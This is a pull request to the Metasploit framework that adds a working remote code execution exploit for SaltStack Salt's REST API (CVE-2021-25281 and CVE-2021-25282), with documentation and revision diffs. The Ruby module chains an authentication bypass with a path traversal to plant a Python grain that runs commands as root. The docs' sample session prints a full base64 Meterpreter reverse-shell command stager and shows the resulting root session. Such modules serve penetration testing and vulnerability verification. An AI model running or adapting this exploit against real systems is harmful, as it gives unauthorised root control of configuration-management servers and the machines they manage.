### PR TITLE
Saltstack Salt API `wheel_async` RCE

### DIFF
--- a/documentation/modules/exploit/linux/http/saltstack_salt_wheel_async_rce.md
+++ b/documentation/modules/exploit/linux/http/saltstack_salt_wheel_async_rce.md
@@ -1,0 +1,141 @@
+## Vulnerable Application
+
+### Description
+
+This module leverages an authentication bypass and directory traversal
+vulnerabilities in Saltstack Salt's REST API to execute commands remotely on
+the `master` as the root user.
+
+Every 60 seconds, `salt-master` service performs a maintenance process check
+that reloads and executes all the `grains` on the `master`, including [custom
+grain
+modules](https://docs.saltproject.io/en/latest/topics/grains/#writing-grains)
+in the Extension Module directory (see `EXTMODSDIR` [option](#extmodsdir)). So,
+this modules simply creates a Python script at this location and wait for being
+executed. The time interval is set to 60 seconds by default but can be changed
+in the `master` configuration file with the `loop_interval` option. Note that,
+if an administrator executes commands locally on the `master`, the maintenance
+process check will also be performed.
+
+It has been fixed in the following installation packages: 3002.5, 3001.6 and
+3000.8
+
+Also, a patch is available for the following versions: 3002.2, 3001.4, 3000.6,
+2019.2.8, 2019.2.5, 2018.3.5, 2017.7.8, 2016.11.10, 2016.11.6, 2016.11.5,
+2016.11.3, 2016.3.8, 2016.3.6, 2016.3.4, 2015.8.13 and 2015.8.10
+
+This module has been tested successfully against versions 3001.4, 3002 and
+3002.2 on Ubuntu 18.04
+
+### Setup
+
+Follow the [installation steps](https://repo.saltstack.com/#ubuntu) for Ubuntu
+or choose another OS from the same page.
+
+## Verification Steps
+
+1. Install the application (follow [Setup](#setup))
+1. Start msfconsole
+1. Do: `use exploit/linux/http/saltstack_salt_wheel_async_rce`
+1. Do: `set rhosts <ip>`
+1. Do: `set lhost <ip>`
+1. Do: `run`
+1. You should get a Meterpreter session.
+
+## Targets
+
+### 0 (Unix Command)
+
+This executes a Unix command.
+
+### 1 (Linux Dropper)
+
+This uses a Linux dropper to execute code.
+
+## Options
+
+### TARGETURI
+
+The base path of the Saltstack Salt application, which is set to `/` by
+default.
+
+### EXTMODSDIR
+
+The Extension Module directory ("extmods") for the `master`. On older versions,
+this directory was `/var/cache/salt/extmods`. It has been moved to
+`/var/cache/salt/master/extmods` from version `2016.3.0` and is the default
+option value. The Python file will be placed in the `grains` directory under
+this path. Salt automatically creates the sub-directories if they don't exist.
+
+## Scenarios
+
+### SaltStack Salt 3002.2 on Ubuntu 18.04
+
+```
+msf6 > use exploit/linux/http/saltstack_salt_wheel_async_rce
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/saltstack_salt_wheel_async_rce) > set rhosts 192.168.144.136
+rhosts => 192.168.144.136
+msf6 exploit(linux/http/saltstack_salt_wheel_async_rce) > set lhost 192.168.144.1
+lhost => 192.168.144.1
+msf6 exploit(linux/http/saltstack_salt_wheel_async_rce) > set verbose true
+verbose => true
+msf6 exploit(linux/http/saltstack_salt_wheel_async_rce) > options
+
+Module options (exploit/linux/http/saltstack_salt_wheel_async_rce):
+
+   Name        Current Setting                 Required  Description
+   ----        ---------------                 --------  -----------
+   EXTMODSDIR  /var/cache/salt/master/extmods  yes       The Extension Module Directory ("extmods")
+   Proxies                                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS      192.168.144.136                 yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT       8000                            yes       The target port (TCP)
+   SSL         true                            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI   /                               yes       Base path
+   URIPATH                                     no        The URI to use for this exploit (default is random)
+   VHOST                                       no        HTTP server virtual host
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.144.1    yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux Dropper
+
+
+msf6 exploit(linux/http/saltstack_salt_wheel_async_rce) > run
+
+[*] Started reverse TCP handler on 192.168.144.1:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[!] The service is running, but could not be validated. Salt API responded as expected.
+[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
+[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXMCokAFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/GoVCZ.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/sYLkD' < '/tmp/GoVCZ.b64' ; chmod +x '/tmp/sYLkD' ; '/tmp/sYLkD' & sleep 2 ; rm -f '/tmp/sYLkD' ; rm -f '/tmp/GoVCZ.b64'"]
+[*] Executing command: echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXMCokAFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/GoVCZ.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/sYLkD' < '/tmp/GoVCZ.b64' ; chmod +x '/tmp/sYLkD' ; '/tmp/sYLkD' & sleep 2 ; rm -f '/tmp/sYLkD' ; rm -f '/tmp/GoVCZ.b64'
+[*] Command Stager progress - 102.16% done (851/833 bytes)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3008420 bytes) to 192.168.144.136
+[+] Deleted /var/cache/salt/master/extmods/grains/b4R9SayBPn.py
+[+] Deleted /var/cache/salt/master/extmods/grains/__pycache__/b4R9SayBPn.cpython-36.pyc
+[*] Meterpreter session 1 opened (192.168.144.1:4444 -> 192.168.144.136:37806) at 2021-03-25 21:23:57 +0100
+
+meterpreter > getuid
+Server username: root @ ubuntu (uid=0, gid=0, euid=0, egid=0)
+meterpreter > sysinfo
+Computer     : 192.168.144.136
+OS           : Ubuntu 18.04 (Linux 5.4.0-70-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > [*] Shutting down Meterpreter...
+
+[*] 192.168.144.136 - Meterpreter session 1 closed.  Reason: User exit
+```

--- a/documentation/modules/exploit/linux/http/saltstack_salt_wheel_async_rce.md
+++ b/documentation/modules/exploit/linux/http/saltstack_salt_wheel_async_rce.md
@@ -11,11 +11,11 @@ that reloads and executes all the `grains` on the `master`, including [custom
 grain
 modules](https://docs.saltproject.io/en/latest/topics/grains/#writing-grains)
 in the Extension Module directory (see `EXTMODSDIR` [option](#extmodsdir)). So,
-this modules simply creates a Python script at this location and wait for being
-executed. The time interval is set to 60 seconds by default but can be changed
-in the `master` configuration file with the `loop_interval` option. Note that,
-if an administrator executes commands locally on the `master`, the maintenance
-process check will also be performed.
+this module simply creates a Python script at this location and waits for it to
+be executed. The time interval is set to 60 seconds by default but can be
+changed in the `master` configuration file with the `loop_interval` option.
+Note that, if an administrator executes commands locally on the `master`, the
+maintenance process check will also be performed.
 
 It has been fixed in the following installation packages: 3002.5, 3001.6 and
 3000.8
@@ -30,7 +30,8 @@ This module has been tested successfully against versions 3001.4, 3002 and
 ### Setup
 
 Follow the [installation steps](https://repo.saltstack.com/#ubuntu) for Ubuntu
-or choose another OS from the same page.
+(or choose another OS from the same page) and the REST API
+[setup instructions](https://docs.saltproject.io/en/latest/ref/netapi/all/salt.netapi.rest_cherrypy.html).
 
 ## Verification Steps
 
@@ -62,10 +63,12 @@ default.
 ### EXTMODSDIR
 
 The Extension Module directory ("extmods") for the `master`. On older versions,
-this directory was `/var/cache/salt/extmods`. It has been moved to
+this directory was `/var/cache/salt/extmods` by default. It has been moved to
 `/var/cache/salt/master/extmods` from version `2016.3.0` and is the default
-option value. The Python file will be placed in the `grains` directory under
-this path. Salt automatically creates the sub-directories if they don't exist.
+option value. Note that this path can be customized in the `master`
+configuration file with the `extension_modules` option. The Python file will be
+placed in the `grains` directory under this path. Salt automatically creates
+the sub-directories if they don't exist.
 
 ## Scenarios
 

--- a/documentation/modules/exploit/linux/http/saltstack_salt_wheel_async_rce.md
+++ b/documentation/modules/exploit/linux/http/saltstack_salt_wheel_async_rce.md
@@ -74,8 +74,8 @@ this path. Salt automatically creates the sub-directories if they don't exist.
 ```
 msf6 > use exploit/linux/http/saltstack_salt_wheel_async_rce
 [*] Using configured payload linux/x64/meterpreter/reverse_tcp
-msf6 exploit(linux/http/saltstack_salt_wheel_async_rce) > set rhosts 192.168.144.136
-rhosts => 192.168.144.136
+msf6 exploit(linux/http/saltstack_salt_wheel_async_rce) > set rhosts 192.168.144.188
+rhosts => 192.168.144.188
 msf6 exploit(linux/http/saltstack_salt_wheel_async_rce) > set lhost 192.168.144.1
 lhost => 192.168.144.1
 msf6 exploit(linux/http/saltstack_salt_wheel_async_rce) > set verbose true
@@ -88,7 +88,7 @@ Module options (exploit/linux/http/saltstack_salt_wheel_async_rce):
    ----        ---------------                 --------  -----------
    EXTMODSDIR  /var/cache/salt/master/extmods  yes       The Extension Module Directory ("extmods")
    Proxies                                     no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS      192.168.144.136                 yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RHOSTS      192.168.144.188                 yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
    RPORT       8000                            yes       The target port (TCP)
    SSL         true                            no        Negotiate SSL/TLS for outgoing connections
    SSLCert                                     no        Path to a custom SSL certificate (default is randomly generated)
@@ -118,24 +118,22 @@ msf6 exploit(linux/http/saltstack_salt_wheel_async_rce) > run
 [*] Executing automatic check (disable AutoCheck to override)
 [!] The service is running, but could not be validated. Salt API responded as expected.
 [*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
-[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXMCokAFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/GoVCZ.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/sYLkD' < '/tmp/GoVCZ.b64' ; chmod +x '/tmp/sYLkD' ; '/tmp/sYLkD' & sleep 2 ; rm -f '/tmp/sYLkD' ; rm -f '/tmp/GoVCZ.b64'"]
-[*] Executing command: echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXMCokAFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/GoVCZ.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/sYLkD' < '/tmp/GoVCZ.b64' ; chmod +x '/tmp/sYLkD' ; '/tmp/sYLkD' & sleep 2 ; rm -f '/tmp/sYLkD' ; rm -f '/tmp/GoVCZ.b64'
+[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXMCokAFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/WlZHG.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/ykmTR' < '/tmp/WlZHG.b64' ; chmod +x '/tmp/ykmTR' ; '/tmp/ykmTR' & sleep 2 ; rm -f '/tmp/ykmTR' ; rm -f '/tmp/WlZHG.b64'"]
+[*] Executing command: echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXMCokAFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/WlZHG.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/ykmTR' < '/tmp/WlZHG.b64' ; chmod +x '/tmp/ykmTR' ; '/tmp/ykmTR' & sleep 2 ; rm -f '/tmp/ykmTR' ; rm -f '/tmp/WlZHG.b64'
+[*] Waiting for the Salt maintenance process check to trigger the payload. This could take some time...
 [*] Command Stager progress - 102.16% done (851/833 bytes)
 [*] Transmitting intermediate stager...(126 bytes)
-[*] Sending stage (3008420 bytes) to 192.168.144.136
-[+] Deleted /var/cache/salt/master/extmods/grains/b4R9SayBPn.py
-[+] Deleted /var/cache/salt/master/extmods/grains/__pycache__/b4R9SayBPn.cpython-36.pyc
-[*] Meterpreter session 1 opened (192.168.144.1:4444 -> 192.168.144.136:37806) at 2021-03-25 21:23:57 +0100
+[*] Sending stage (3008420 bytes) to 192.168.144.188
+[+] Deleted /var/cache/salt/master/extmods/grains/lUhZUGix.py
+[+] Deleted /var/cache/salt/master/extmods/grains/__pycache__/lUhZUGix.cpython-36.pyc
+[*] Meterpreter session 1 opened (192.168.144.1:4444 -> 192.168.144.188:42792) at 2021-03-26 14:58:16 +0100
 
 meterpreter > getuid
 Server username: root @ ubuntu (uid=0, gid=0, euid=0, egid=0)
 meterpreter > sysinfo
-Computer     : 192.168.144.136
+Computer     : 192.168.144.188
 OS           : Ubuntu 18.04 (Linux 5.4.0-70-generic)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux
-meterpreter > [*] Shutting down Meterpreter...
-
-[*] 192.168.144.136 - Meterpreter session 1 closed.  Reason: User exit
 ```

--- a/modules/exploits/linux/http/saltstack_salt_wheel_async_rce.rb
+++ b/modules/exploits/linux/http/saltstack_salt_wheel_async_rce.rb
@@ -25,12 +25,12 @@ class MetasploitModule < Msf::Exploit::Remote
           Every 60 seconds, `salt-master` service performs a maintenance
           process check that reloads and executes all the `grains` on the
           `master`, including custom grain modules in the Extension Module
-          directory. So, this modules simply creates a Python script at this
-          location and wait for being executed. The time interval is set to 60
-          seconds by default but can be changed in the `master` configuration
-          file with the `loop_interval` option. Note that, if an administrator
-          executes commands locally on the `master`, the maintenance process
-          check will also be performed.
+          directory. So, this module simply creates a Python script at this
+          location and waits for it to be executed. The time interval is set to
+          60 seconds by default but can be changed in the `master`
+          configuration file with the `loop_interval` option. Note that, if an
+          administrator executes commands locally on the `master`, the
+          maintenance process check will also be performed.
 
           It has been fixed in the following installation packages: 3002.5,
           3001.6 and 3000.8.
@@ -161,8 +161,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     send_request(data: data, path: path)
     vprint_status(
-      'Waiting for the Salt maintenance process check to trigger the payload. '\
-      'This could take some time...'
+      "Waiting up to #{wfs_delay} seconds for the Salt maintenance process check "\
+      'to trigger the payload (WfsDelay option).'
     )
   end
 

--- a/modules/exploits/linux/http/saltstack_salt_wheel_async_rce.rb
+++ b/modules/exploits/linux/http/saltstack_salt_wheel_async_rce.rb
@@ -1,0 +1,255 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SaltStack Salt API Unauthenticated RCE',
+        'Description' => %q{
+          This module leverages an authentication bypass and directory
+          traversal vulnerabilities in Saltstack Salt's REST API to execute
+          commands remotely on the `master` as the root user.
+
+          Every 60 seconds, `salt-master` service performs a maintenance
+          process check that reloads and executes all the `grains` on the
+          `master`, including custom grain modules in the Extension Module
+          directory. So, this modules simply creates a Python script at this
+          location and wait for being executed. The time interval is set to 60
+          seconds by default but can be changed in the `master` configuration
+          file with the `loop_interval` option. Note that, if an administrator
+          executes commands locally on the `master`, the maintenance process
+          check will also be performed.
+
+          It has been fixed in the following installation packages: 3002.5,
+          3001.6 and 3000.8
+
+          Also, a patch is available for the following versions: 3002.2,
+          3001.4, 3000.6, 2019.2.8, 2019.2.5, 2018.3.5, 2017.7.8, 2016.11.10,
+          2016.11.6, 2016.11.5, 2016.11.3, 2016.3.8, 2016.3.6, 2016.3.4,
+          2015.8.13 and 2015.8.10
+
+          This module has been tested successfully against versions 3001.4,
+          3002 and 3002.2 on Ubuntu 18.04
+        },
+        'Author' => [
+          'Alex Seymour',           # Original PoC
+          'Christophe De La Fuente' # MSF Module
+        ],
+        'References' => [
+          ['CVE', '2021-25281'], # Auth bypass
+          ['CVE', '2021-25282'], # Directory traversal
+          ['URL', 'https://saltproject.io/security_announcements/active-saltstack-cve-release-2021-feb-25/'],
+          ['URL', 'https://github.com/Immersive-Labs-Sec/CVE-2021-25281/blob/main/cve-2021-25281.py']
+        ],
+        'DisclosureDate' => '2021-02-25',
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'DefaultOptions' => {
+                'CMDSTAGER::FLAVOR' => :bourne,
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 1,
+        'DefaultOptions' => {
+          'WfsDelay' => 90, # The master's maintenance process check cycle is set to 60 sec. by default
+          'SSL' => true     # Salt API uses HTTPS by default
+        },
+        'Notes' => {
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS] # Payload visible in log if set to DEBUG or TRACE level
+        }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(8000),
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new(
+        'EXTMODSDIR',
+        [
+          true,
+          'The Extension Module Directory ("extmods")',
+          '/var/cache/salt/master/extmods'
+        ]
+      )
+    ])
+  end
+
+  def check
+    fun = 'config.values'
+    res = send_request(fun: fun)
+
+    unless res
+      return CheckCode::Unknown('Target did not respond to check.')
+    end
+
+    # Server: CherryPy/8.9.1
+    unless res.headers['Server']&.match(%r{^CherryPy/[\d.]+$})
+      return CheckCode::Unknown('Target does not appear to be running Salt API.')
+    end
+
+    if res.code == 200 && res.get_json_document['return']
+      res_json = res.get_json_document['return'].first
+      if res_json&.key?('tag') && res_json&.key?('jid')
+        return CheckCode::Detected('Salt API responded as expected.')
+      end
+    end
+
+    CheckCode::Safe('Unexpected Salt API response')
+  end
+
+  def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager(background: true)
+    end
+
+  end
+
+  def execute_command(cmd, _opts = {})
+    vprint_status("Executing command: #{cmd}")
+
+    @rand_basename = rand_text_alphanumeric(4..12)
+    path = normalize_uri(datastore['EXTMODSDIR'], 'grains', "#{@rand_basename}.py")
+    register_file_for_cleanup(path)
+
+    cmd.gsub!("'", "\\\\'")
+    data = <<~PYTHON
+      import subprocess
+      def #{rand_text_alpha(6..8)}():
+          subprocess.Popen('#{cmd}', shell=True)
+          return {}
+    PYTHON
+
+    send_request(data: data, path: path)
+  end
+
+  def send_request(fun: 'pillar_roots.write', data: '', path: '')
+    # https://docs.saltstack.com/en/latest/ref/netapi/all/salt.netapi.rest_cherrypy.html#post--run
+    json = {
+      'eauth' => 'auto',
+      'client' => 'wheel_async',
+      'fun' => fun
+    }
+    json['data'] = data unless data.empty?
+    json['path'] = "../../../../../..#{path}" unless path.empty?
+
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'run'),
+      'ctype' => 'application/json',
+      'data' => json.to_json
+    )
+  end
+
+  def path_exists?(session, path, is_dir: false)
+    if session.type == 'meterpreter'
+      path_exists = begin
+        session.fs.file.stat(path)
+      rescue StandardError
+        nil
+      end
+      if is_dir
+        return !!(path_exists && path_exists.directory?)
+      else
+        return !!(path_exists && path_exists.file?)
+      end
+    else
+      path_exists = session.shell_command_token(
+        "test #{is_dir ? '-d' : '-f'} \"#{path}\" && echo true"
+      )
+      return !!(path_exists && path_exists =~ /true/)
+    end
+  end
+
+  def on_new_session(session)
+    payload_instance.stop_handler
+    super
+
+    # The Python script is being cached in the "__pycache__" directory as a
+    # compiled bytecode file (.pyc). This will need to be deleted to avoid
+    # being executed over and over.
+    path = normalize_uri(datastore['EXTMODSDIR'], 'grains', '__pycache__')
+    if session.type == 'meterpreter'
+      session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')
+      return unless path_exists?(session, path, is_dir: true)
+
+      files = begin
+        session.fs.dir.entries(path, "#{@rand_basename}*.pyc")
+      rescue StandardError
+        []
+      end
+
+      files.each do |file|
+        file_path = normalize_uri(path, file)
+        next unless path_exists?(session, file_path)
+
+        session.fs.file.rm(file_path)
+
+        if path_exists?(session, file_path)
+          print_warning("Unable to delete #{file_path}")
+        else
+          print_good("Deleted #{file_path}")
+        end
+      end
+    else
+      return unless path_exists?(session, path, is_dir: true)
+
+      files = session.shell_command_token(
+        "find \"#{path}\" -maxdepth 1 -type f -name \"#{@rand_basename}*.pyc\""
+      )
+
+      files.each_line do |file|
+        file.chomp!
+        next unless path_exists?(session, file)
+
+        session.shell_command_token("rm -f \"#{file}\" >/dev/null")
+
+        if path_exists?(session, file)
+          print_warning("Unable to delete #{file}")
+        else
+          print_good("Deleted #{file}")
+        end
+      end
+    end
+  end
+
+end

--- a/modules/exploits/linux/http/saltstack_salt_wheel_async_rce.rb
+++ b/modules/exploits/linux/http/saltstack_salt_wheel_async_rce.rb
@@ -160,6 +160,10 @@ class MetasploitModule < Msf::Exploit::Remote
     PYTHON
 
     send_request(data: data, path: path)
+    vprint_status(
+      'Waiting for the Salt maintenance process check to trigger the payload. '\
+      'This could take some time...'
+    )
   end
 
   def send_request(fun: 'pillar_roots.write', data: '', path: '')

--- a/modules/exploits/linux/http/saltstack_salt_wheel_async_rce.rb
+++ b/modules/exploits/linux/http/saltstack_salt_wheel_async_rce.rb
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'SaltStack Salt API Unauthenticated RCE',
+        'Name' => 'SaltStack Salt API Unauthenticated RCE through wheel_async client',
         'Description' => %q{
           This module leverages an authentication bypass and directory
           traversal vulnerabilities in Saltstack Salt's REST API to execute
@@ -33,15 +33,15 @@ class MetasploitModule < Msf::Exploit::Remote
           check will also be performed.
 
           It has been fixed in the following installation packages: 3002.5,
-          3001.6 and 3000.8
+          3001.6 and 3000.8.
 
           Also, a patch is available for the following versions: 3002.2,
           3001.4, 3000.6, 2019.2.8, 2019.2.5, 2018.3.5, 2017.7.8, 2016.11.10,
           2016.11.6, 2016.11.5, 2016.11.3, 2016.3.8, 2016.3.6, 2016.3.4,
-          2015.8.13 and 2015.8.10
+          2015.8.13 and 2015.8.10.
 
           This module has been tested successfully against versions 3001.4,
-          3002 and 3002.2 on Ubuntu 18.04
+          3002 and 3002.2 on Ubuntu 18.04.
         },
         'Author' => [
           'Alex Seymour',           # Original PoC
@@ -89,6 +89,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'SSL' => true     # Salt API uses HTTPS by default
         },
         'Notes' => {
+          'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
           'SideEffects' => [IOC_IN_LOGS] # Payload visible in log if set to DEBUG or TRACE level
         }
@@ -141,7 +142,6 @@ class MetasploitModule < Msf::Exploit::Remote
     when :linux_dropper
       execute_cmdstager(background: true)
     end
-
   end
 
   def execute_command(cmd, _opts = {})


### PR DESCRIPTION
This adds an exploit module that leverages an authentication bypass and directory traversal vulnerabilities in Saltstack Salt's REST API to execute commands remotely on the `master` as the root user.

Every 60 seconds, `salt-master` service performs a maintenance process check that reloads and executes all the `grains` on the `master`, including [custom grain modules](https://docs.saltproject.io/en/latest/topics/grains/#writing-grains) in the Extension Module directory (see `EXTMODSDIR` module option in the documentation). So, this modules simply creates a Python script at this location and wait for being executed. The time interval is set to 60 seconds by default but can be changed in the `master` configuration file with the `loop_interval` option. Note that, if an administrator executes commands locally on the `master`, the maintenance process check will also be performed.

It has been fixed in the following installation packages: 3002.5, 3001.6 and 3000.8

Also, a patch is available for the following versions: 3002.2, 3001.4, 3000.6, 2019.2.8, 2019.2.5, 2018.3.5, 2017.7.8, 2016.11.10, 2016.11.6, 2016.11.5, 2016.11.3, 2016.3.8, 2016.3.6, 2016.3.4, 2015.8.13 and 2015.8.10.

This module has been tested successfully against versions 3001.4, 3002 and 3002.2 on Ubuntu 18.04.

## Setup

Follow the [installation steps](https://repo.saltstack.com/#ubuntu) for Ubuntu or choose another OS from the same page.

## Verification

- [ ] Install the application (follow [Setup](#setup))
- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/saltstack_salt_wheel_async_rce`
- [ ] `set rhosts <ip>`
- [ ] `set lhost <ip>`
- [ ] `run`
- [ ] **Verify** you got a Meterpreter session as the root user
